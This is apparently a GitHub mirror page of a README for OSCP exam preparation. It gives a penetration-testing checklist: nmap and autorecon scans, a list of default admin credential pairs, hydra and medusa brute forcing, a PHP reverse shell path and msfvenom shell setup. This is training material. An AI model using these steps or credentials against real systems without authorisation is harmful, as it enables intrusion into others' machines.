Git Product home page Git Product logo

cpt-jack-a-castle / oscp-prep-1 Goto Github PK

View Code? Open in Web Editor NEW

This project forked from ice-wzl/hacknetics

0.0 0.0 0.0 41.04 MB

Contained is all my reference material for my OSCP preparation. Designed to be a one stop shop for code, guides, command syntax, and high level strategy. One simple clone and you have access to some of the most popular tools used for pentesting.

License: The Unlicense

Shell 39.06% Python 2.47% Perl 2.67% C 0.37% PHP 5.68% PowerShell 46.38% Batchfile 3.34% VBScript 0.02%

oscp-prep-1's Introduction

OSCP-Prep

This repo is not complete yet, I am working on it daily.

Additional References

Step 1 Recon

  • Can you ping the target?
  • Is your VPN still connected?

Path

Start with recon-enumeration folder

  • Start the scans: What is open?
  • Use autorecon 10.10.10.10 -v
  • Once completed, rescan all ports with service detection nmap -sS -sV -sC 10.10.10.10 | tee nmap_output.txt
  • Consider running some targeted scripts against services running.
nmap --script "http*" 10.10.10.10 -p 8080 -vv | tee nmap_http_scripts.txt
  • Identify the Ports and Services running.

Web Server Running?

  • Go To: /web/web-servers.md
  • Find out CMS type and version --> check exploitdb
  • Look for usernames
  • Run nikto, gobuster --> try and map out the website
  • robots.txt file?
  • Default Credentials
admin:admin
administrator:administrator
admin:administrator
admin:password
administrator:password
admin admin123
admin root123
admin password1
admin administrator1
admin changeme1
admin password123
admin qwerty123
admin administrator123
admin changeme123

Upload Vulnerability PHP web shells

  • The best one for Linux and Windows
  • /shells/web-shells/php-reverse-shell/src/php_reverse_shell.php

FTP Running

  • Try anonymous login method
  • If you can get a username from another port try hydra
  • Make sure to connect to it as the root user from your local box
  • Remember the difference between Active and Passive mode

SSH/Telnet Running port 22, 23

  • Be on the look out for LFI on a web server --> Private keys
  • Think about Hydra if you can find a username

Email Ports 25, 110, 143?

  • /recon-enumeration/recon-enumeration.md

NFS port 2049

  • /recon-enumeration/recon-enumeration.md
  • Check for shares that are accessible

NetBios or Microsoft-ds Running ports 137, 138, 139, 445

  • /recon-enumeration/recon-enumeration.md --> SMB Enumeration section
  • Use smbmap, nmap --script, enum4linux, smbclient, rpcclient
  • Check all enum4linux output especially toward the bottom for potential usernames
  • Can be brute forced with medusa, and nmap --script "smb-brute"

Redis port 6379

  • /recon-enumeration/recon-enumeration.md
  • Redis Section

Rsync port 873

  • /recon-enumeration/recon-enumeration.md
  • Rsync Section

On a Windows Box

  • /windows-priv-esc/win-priv-esc.md
  • Set up secondary Shell with msfvenom and multi/handler
  • Check for hidden files as well
  • Can you enable RDP and use xfreerdp to mount your kali share to the target?

On a Linux Box

  • /lin-priv-esc/lin-priv-esc.md
  • Set up secondary Shell with msfvenom and multi/handler
  • Always stabilize your shells!
  • Get lse.sh and linpeas.sh on the box and in /dev/shm
  • /lin-priv-esc/priv-esc-scripts/

oscp-prep-1's People

Contributors

ice-wzl avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.